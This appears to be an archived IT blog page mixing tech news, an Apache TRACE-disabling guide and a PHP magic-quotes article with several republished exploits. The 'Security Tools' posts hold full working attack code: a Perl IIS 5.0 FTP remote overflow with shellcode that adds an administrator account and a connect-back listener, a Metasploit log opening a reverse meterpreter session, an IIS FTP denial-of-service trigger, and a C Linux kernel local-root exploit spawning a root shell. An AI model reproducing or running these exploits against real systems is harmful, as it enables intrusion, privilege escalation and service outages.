GO IT WORLD | IT TECH | IT NEWS

goitworld.com

Sep 13

Facebook Lite is here. Verdict: Better

As expected, Facebook is slimming down. The new "Lite" version of Facebook is available for users in the United States and India, according to TechCrunch.

The new version of the site appears to be much cleaner and simpler. It appears, at a quick glance, to be a better site for Facebook newbies or for anyone who finds the current site overwhelming or noisy. It also pushes the old-school Facebook apps off a cliff, which is just as well for the newest Facebook-connected services. Try it at lite.facebook.com.

The major visual change in Facebook Lite, compared Facebook "Classic," is simply that most of the the navigation and info page that was on the left of the page is now gone. The user is not distracted by the mostly superfluous details that resided there. The input box is also gone, replaced by buttons (Write, Post Photos, Post Video) that pop down the actual input forms only when needed.

The new layout feels simpler and faster, almost Twitter-like.

The new Lite version of Facebook is cleaner and faster.

(Credit: Screenshot by Rafe Needleman/CNET)

Facebook "Classic" has a lot of navigational elements and more data that make the site cluttlered, in comparison.

(Credit: Screenshot by Rafe Needleman/CNET)

Other tweaks that diehards might notice: the "Friends" tab in the top navigation of Facebook Classic is missing in Facebook Lite, replaced by a new "Events" link that opens up a page of invitations.

All pages on the site seem to be affected. They are simpler, easier to read, and faster. They load faster, partly due to what appears to be HTML optimization at Facebook. My profile page in Facebook Lite weighed in at 11K, compared to 44K in the Classic version. However, the smaller pages may also come courtesy of a dramatically decreased advertising load, which I doubt we can count on continuing, once Facebook Lite enters the mainstream.

I like the Lite site more than the old Facebook and am moving over to it now. Nice job, Facebook.

Tagged with: Facebook

Sep 12

Hacker pleads guilty to ID thefts netting millions

By jason IT News World No Comments »

A 28-year-old Miami man who made millions breaking into computer networks and stealing credit card numbers pleaded guilty on Friday and agreed to forfeit more than $2.7 million in restitution, as well as a condo, jewelry, and a car.

Albert Gonzalez, a former federal government informant and the alleged ringleader of one of the largest known identity theft cases in U.S. history, pleaded guilty (as expected) to 19 counts of conspiracy, computer fraud, wire fraud, access device fraud, and aggravated identity theft related to theft of credit and debit card data from TJX Companies (owner of T.J. Maxx), BJ’s Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, among other retailers.

Gonzalez, along with 10 others from the U.S., Eastern Europe, and China, were accused in August 2008 of breaking into retail credit card payment systems using wardriving (searching for unsecured wireless networks while driving by with a laptop), and installing sniffer programs to capture data.

He also pleaded guilty to one count of conspiracy to commit wire fraud related to hacks into the network of the Dave & Buster’s restaurant chain. He was indicted on that charge in New York in May 2008.

Gonzalez still faces charges in New Jersey of conspiring to steal credit card numbers from Heartland Payment Systems, 7-Eleven, and supermarket chain Hannaford Brothers following an indictment handed down against him and two unnamed Russians last month.

Gonzalez and his alleged co-conspirators sold the numbers to others and encoded the data onto magnetic stripes of blank cards and used the new cards to withdraw tens of thousands of dollars at a time from ATMs, according to the indictments. They concealed and laundered their proceeds by using anonymous Internet-based currencies within the U.S. and abroad, and by channeling money through bank accounts in Eastern Europe, court documents indicate.

Under the terms of the plea agreements, Gonzalez faces up to 25 years in prison for the Boston charges and up to 20 years on the New York charges and will serve the terms concurrently. He also faces fines of at least $500,000.

As for restitution, Gonzalez has agreed to forfeit his Miami condo, a 2006 BMW 330i, a Tiffany diamond ring, Rolex watches, and more than $1 million in cash that was buried in his back yard.

Sentencing is scheduled for December 8. Gonzalez’ attorney, Rene Palomino, did not immediately respond to a request for comment.

Tagged with: Albert Gonzalez • hackers • identity fraud • TJX

Sep 10

How To Disable Apache the HTTP TRACE method

By jason Apache Server 149 Comments »

Description: How to disable the HTTP TRACE method on recent apache versions.

Most vulnerability scanners (like the popular nessus, but commercial ones also) will complain (normally as a low thread or warning level) about TRACE method being enabled on the web server tested.

Normally you will have this enabled by default, but if you want to test if it is really enabled on your server you just have to telnet on the port your web server is running and request for “TRACE / HTTP/1.0” if you get a positive reply it means TRACE is enabled on your system. The output of a server with TRACE enabled will look like:

telnet 127.0.0.1 80 Trying 127.0.0.1… Connected to 127.0.0.1. Escape character is ‘^]’.
TRACE / HTTP/1.0 Host: foo Any text entered here will be echoed back in the response <- ENTER twice to finish HTTP/1.1 200 OK
Date: Wed, 10 Sep 2009 22:19:36 GMT
Server: Apache/2.2.6 (Debian) PHP/4.4.4-9 mod_ruby/1.2.6 Ruby/1.8.6(2007-06-07)
Connection: close
Content-Type: message/http TRACE / HTTP/1.0
Host: foo Any text entered here will be echoed back in the response Connection closed by foreign host.

Traditionally experts will suggest to disable this using some rewrite rules like:

RewriteEngine On RewriteCond %{REQUEST_METHOD} ^TRACE RewriteRule .* - [F]
(this needs to be added somewhere in your main apache config file outside of any vhost or directory config).

Still this has the disadvantage that you need to have mod_rewrite enabled on the server just to mention one. But for apache versions newer than 1.3.34 for the legacy branch, and 2.0.55 (or newer) for apache2 this can be done very easily because there is a new apache variable that controls if TRACE method is enabled or not:
TraceEnable off
This needs to be added in the main server config and the default is enabled (on). TraceEnable off causes apache to return a 403 FORBIDDEN error to the client.

After setting this and reloading the apache config the same server as above shows:

telnet 127.0.0.1 80
Trying 127.0.0.1… Connected to 127.0.0.1.
Escape character is ‘^]’.
TRACE / HTTP/1.0 Host: foo testing… <- ENTER twice HTTP/1.1 403 Forbidden
Date: Wed, 20 Sep 2009 22:28:31 GMT
Server: Apache/2.2.6 (Debian) PHP/4.4.4-9 mod_ruby/1.2.6 Ruby/1.8.6(2007-06-07)
Content-Length: 320 Connection: close
Content-Type: text/html;
charset=iso-8859-1
<!DOCTYPE HTML(link) PUBLIC "-//IETF//DTD HTML(link) 2.0//EN">
<html>
<head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don’t have permission to access / on this server.</p>
<hr> <address>Apache/2.2.6 (Debian) PHP/4.4.4-9 mod_ruby/1.2.6 Ruby/1.8.6(2007-06-07) Server at foo Port 80</address>
</body>
</html>
Connection closed by foreign host.

Tagged with: apache • trace method

Sep 09

Google shows off videos in text ads

By jason IT News World No Comments »

Google showed off video trailers inside text ads for financial analysts Wednesday.

Google sought to remind financial analysts Wednesday that despite all the attention it devotes to projects like Google Apps, staying on top of search and search advertising is what really matters.

The first in a series of investor Webcasts was held Wednesday by Google CFO Patrick Pichette and several other executives, and while the company did not unearth any ground-breaking shifts in strategy or new products, it did cast a spotlight on some recent improvements that the company believes have enhanced the search experience. Perhaps the most notable was the recent addition of video ads directly below text ads on the top or right-hand side of the search results page, which can be played directly on that page.

This started to emerge for some users last week according to ReelSEO, but Google is now offering advertisers a chance to insert a video trailer into their text ads. "In many cases, the best information is video," said Nick Fox, business product management director on Google’s AdWords team.

For example, Fox demonstrated how Electronic Arts is using a video trailer inside an ad for the new Tiger Woods video game. The result is a marriage of the text ad format that Google has used to rise into a dominant Internet company with the display ad style that others, such as Yahoo, are hoping to finally make a success.

"Google hasn’t made many changes to its text ad format and now sees this as a big opportunity," wrote J.P. Morgan’s Imran Khan in a research note distributed after the Webcast. It can charge either by the click through to the advertiser’s Web site or by the play of the video, therefore adding a revenue stream that didn’t exist before.

Tagged with: advertising • google • search • video

Sep 08

PHP Code Security Part 6

By jason PHP World 2 Comments »

Magic Quotes:

What are Magic Quotes:

Magic Quotes is a process that automagically escapes incoming data to the PHP script. It’s preferred to code with magic quotes off and to instead escape the data at runtime, as needed.

Why did we use Magic Quotes:

There is no reason to use magic quotes because they are no longer a supported part of PHP. However, they did exist and did help a few beginners blissfully and unknowingly write better (more secure) code. But, when dealing with code that relies upon this behavior it’s better to update the code instead of turning magic quotes on. So why did this feature exist? Simple, to help prevent SQL Injection. Today developers are better aware of security and end up using database specific escaping mechanisms and/or prepared statements instead of relying upon features like magical quotes.

Why not to use Magic Quotes:

Portability Assuming it to be on, or off, affects portability. Use get_magic_quotes_gpc() to check for this, and code accordingly.

Performance Because not every piece of escaped data is inserted into a database, there is a performance loss for escaping all this data. Simply calling on the escaping functions (like addslashes()) at runtime is more efficient. Although php.ini-dist enables these directives by default, php.ini-recommended disables it. This recommendation is mainly due to performance reasons.

Inconvenience Because not all data needs escaping, it’s often annoying to see escaped data where it shouldn’t be. For example, emailing from a form, and seeing a bunch of \’ within the email. To fix, this may require excessive use of stripslashes().

Disabling Magic Quotes:

The magic_quotes_gpc directive may only be disabled at the system level, and not at runtime. In otherwords, use of ini_set() is not an option.

Example #1 Disabling magic quotes server side

An example that sets the value of these directives to Off in php.ini. For additional details, read the manual section titled How to change configuration settings.

; Magic quotes ; ; Magic quotes for incoming GET/POST/Cookie data. magic_quotes_gpc = Off ; Magic quotes for runtime-generated data, e.g. data from SQL, from exec(), etc. magic_quotes_runtime = Off ; Use Sybase-style magic quotes (escape ‘ with ” instead of \’). magic_quotes_sybase = Off

If access to the server configuration is unavailable, use of .htaccess is also an option. For example:

php_flag magic_quotes_gpc Off

In the interest of writing portable code (code that works in any environment), like if setting at the server level is not possible, here’s an example to disable magic_quotes_gpc at runtime. This method is inefficient so it’s preferred to instead set the appropriate directives elsewhere.

Example #2 Disabling magic quotes at runtime

<?php if (get_magic_quotes_gpc()) {


    function stripslashes_deep($value)
    {
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
        return $value;
    }
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

?>

Tagged with: magic quotes • php security

Sep 07

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)

By jason Security Tools No Comments »

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => ’21′,
                              Proto    => ‘tcp’);
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => ‘tcp’, Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Tagged with: exploit • ftp server • microsoft iis5 • overflow

Sep 06

Google’s mystery UFO doodle finally explained

By jason IT News World 1 Comment »

I know there are some people who have not slept for fear that Google had finally committed itself to some alien culture.

Well, some outerworldly alien culture. Well, some outerworldly alien culture where all beings were green and no one used phrases like "market segmentation" and "41 shades of blue."

You see, a mysterious doodle appeared on the Google home page. It showed an alien spacecraft making off with the second "O" in the word "Google."

Were we really expected to merely gogle now? Didn’t that sound uncomfortably close to ogling?

Though there were no references to the Church of Scientology, Google’s first pronouncement on the subject did not quell the concern.

The questionably benign company declared: "We consider the second ‘o’ critical to user recognition of our brand and pronunciation of our name. We are actively looking into the mysterious tweet that has appeared on the Google twitter stream and the disappearance of the ‘o’ on the Google home page. We hope to have an update in the coming weeks."

The world continued experiencing the occasional shudder, until Google’s Twitter page produced this revelatory tweet on Friday: "1.12.12 25.15.21.18 15 1.18.5 2.5.12.15.14.7 20.15 21.19."

Well, it was revelatory to those who think in a certain way, one to which I can only aspire.

"Yes, of course," those who think that way said to themselves, while simultaneously slapping their heads with a fly-swatter. "It’s a reference to that wonderful Japanese video game of the 1980s, Zero Wing."

Now, look, I’ve heard of Vera Wang. But somehow Zero Wing passed me by, though I think it would be an excellent name for a fashion designer.

However, those on the inside (of the spacecraft) tell me that Zero Wing is terribly cool and features extremely characteristic English translations.

Apparently, Cats, a villain even greater than the Andrew Lloyd Webber musical, makes this declaration at the beginning of Zero Wing: "How are you gentlemen. All your base are belong to us."

Well, when you take all those numbers in the Google tweet and turn them into the corresponding letters of the alphabet, you get: "All your O are belong to us."

Why would some Googlies want to feature Zero Wing now? Well, it’s the game’s 20th anniversary.

So there. The problem is solved. The world is safe. Google has not been taken over by aliens.

Or can we really be sure of that?

Tagged with: gaming • google • home page • video games • Zero Wing

Sep 05

SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta)

By jason Security Tools No Comments »

#–attack-log–
#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$
./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
#[*] Please wait while we load the module tree…
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Sending stage (718336 bytes)
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)

#meterpreter >

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            ‘Name’           => ‘SIDVault 2.0e Windows Remote Buffer Overflow’,
            ‘Description’    => %q{
                This exploits a buffer overflow in the LDAP service that is
                part of the SIDVault product. This module was tested against
                version 2.0e.
            },
            ‘Author’      => [ 'His0k4 <his0k4.hlm[at]gmail.com>’ ],
            ‘License’        => MSF_LICENSE,
            ‘Version’        => ‘$Revision$’,
            ‘References’     =>
                [
                    [ 'URL', 'Tagged with: exploit • remote buffer overflow • sidvault • windows

Sep 04

Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service

By jason Security Bulletin No Comments »

***** MS IIS FTPD DoS ZER0DAY *****

There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.

Example session where the anonymous user has read access to the folder "pub":

C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
…
p*/../pub:
pub
…
p*/../pub:
pub
…
p*/../pub:
pub
…
p*/../pub:
pub
…
Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed
the connection)
ftp>
ftp>

By looking into my debugging session with OllyDbg I see that an
exception is raised and
the ftp service crashes due to a "stack overflow", what is a stack exhaustion.
If the ftp service is set to "manual" startup in services control
manager the service
needs to be restarted manually.
IIS 5.0 and 6.0 were tested and are affected.

Best Regards,

Nikolaos Rangos

Tagged with: denial of service • ftp • microsoft iis

Sep 02

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit

By jason Security Tools 2 Comments »

/***********************************************************
* hoagie_udp_sendmsg.c
* LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) – CVE-2009-2698
*
* udp_sendmsg bug exploit via (*output) callback function
* used in dst_entry / rtable
*
* Bug reported by Tavis Ormandy and Julien Tinnes
* of the Google Security Team
*
* Tested with Debian Etch (r0)
*
* $ cat /etc/debian_version
* 4.0
* $ uname -a
* Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
* $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
* $ ./hoagie_udp_sendmsg
* hoagie_udp_sendmsg.c – linux root < 2.6.19 local
* -andi / void.at
*
* sh-3.1# id
* uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
* sh-3.1#
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* andi@void.at
* http://www.void.at
*
************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>

/**
* this code will be called from NF_HOOK via (*output) callback in kernel mode
*/
void set_current_task_uids_gids_to_zero() {
   asm("push %eax\n"
       "movl $0xffffe000, %eax\n"
       "andl %esp, %eax\n"
       "movl (%eax), %eax\n"
       "movl $0×0, 0×150(%eax)\n"
       "movl $0×0, 0×154(%eax)\n"
       "movl $0×0, 0×158(%eax)\n"
       "movl $0×0, 0x15a(%eax)\n"
       "movl $0×0, 0×160(%eax)\n"
       "movl $0×0, 0×164(%eax)\n"
       "movl $0×0, 0×168(%eax)\n"
       "movl $0×0, 0x16a(%eax)\n"
       "pop %eax\n");
}

int main(int argc, char **argv) {
   int s;
   struct msghdr header;
   struct sockaddr_in sin;
   char *rtable = NULL;

   fprintf(stderr,
           "hoagie_udp_sendmsg.c – linux root <= 2.6.19 local\n"
                  "-andi / void.at\n\n");

   s = socket(PF_INET, SOCK_DGRAM, 0);
   if (s == -1) {
      fprintf(stderr, "[*] can’t create socket\n");
      exit(-1);
   }

   /**
    * initialize required variables
    */
   memset(&header, 0, sizeof(struct msghdr));
   memset(&sin, 0, sizeof(struct sockaddr_in));
   sin.sin_family = AF_INET;
   sin.sin_addr.s_addr = inet_addr("127.0.0.1");
   sin.sin_port = htons(22);
   header.msg_name = &sin;
   header.msg_namelen = sizeof(sin);

   /**
    * and this is the trick:
    * we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0×74)
    * so we map our rtable buffer at offset 0 and set output callback function
    *
    * struct dst_entry
    * {
    *         struct dst_entry        *next;
    *         atomic_t                __refcnt;       client references
    *         int                     __use;
    *         struct dst_entry        *child;
    *         struct net_device       *dev;
    *         short                   error;
    *         short                   obsolete;
    *         int                     flags;
    * #define DST_HOST                1
    * #define DST_NOXFRM              2
    * #define DST_NOPOLICY            4
    * #define DST_NOHASH              8
    * #define DST_BALANCED            0×10
    *         unsigned long           lastuse;
    *         unsigned long           expires;
    *
    *         unsigned short          header_len;     * more space at head required *
    *         unsigned short          trailer_len;    * space to reserve at tail *
    *
    *         u32                     metrics[RTAX_MAX];
    *         struct dst_entry        *path;
    *
    *         unsigned long           rate_last;      * rate limiting for ICMP *
    *         unsigned long           rate_tokens;
    *
    *         struct neighbour        *neighbour;
    *         struct hh_cache         *hh;
    *         struct xfrm_state       *xfrm;
    *
    *         int                     (*input)(struct sk_buff*);
    *         int                     (*output)(struct sk_buff*);
    *
    * #ifdef CONFIG_NET_CLS_ROUTE
    *         __u32                   tclassid;
    * #endif
    *
    *         struct dst_ops         *ops;
    *         struct rcu_head         rcu_head;
    *
    *         char                    info[0];
    * };
    *
    * struct rtable
    * {
    *         union
    *         {
    *                 struct dst_entry        dst;
    *                 struct rtable           *rt_next;
    *         } u;
    *
    *         struct in_device        *idev;
    *
    *         unsigned                rt_flags;
    *         __u16                   rt_type;
    *         __u16                   rt_multipath_alg;
    *
    *         __be32                  rt_dst; * Path destination     *
    *         __be32                  rt_src; * Path source          *
    *         int                     rt_iif;
    *
    *         * Info on neighbour *
    *         __be32                  rt_gateway;
    *
    *         * Cache lookup keys *
    *         struct flowi            fl;
    *
    *         * Miscellaneous cached information *
    *          __be32                  rt_spec_dst; * RFC1122 specific destination *
    *         struct inet_peer        *peer; * long-living peer info *
    * };
    *
    */
   rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
   if (rtable == MAP_FAILED) {
      fprintf(stderr, "[*] mmap failed\n");
      exit(-1);
   }
   *(int *)(rtable + 0×74) = (int)set_current_task_uids_gids_to_zero;

   /* trigger exploit
    *
    * the second sendmsg() call will call ip_append_data() with rt == NULL
    * because of:
    * if (up->pending) {
    *          *
    *          * There are pending frames.
    *          * The socket lock must be held while it’s corked.
    *          *
    *          lock_sock(sk);
    *          if (likely(up->pending)) {
    *                    if (unlikely(up->pending != AF_INET)) {
    *                            release_sock(sk);
    *                            return -EINVAL;
    *                    }
    *                    goto do_append_data;
    *            }
    *            release_sock(sk);
    *    }
    *
    */
   sendmsg(s, &header, MSG_MORE|MSG_PROXY);
   sendmsg(s, &header, 0);

close(s);

system("/bin/sh");

return 0;
}

Tagged with: kernel • linux • local root exploit • udp_sendmsg

Previous Entries Next Entries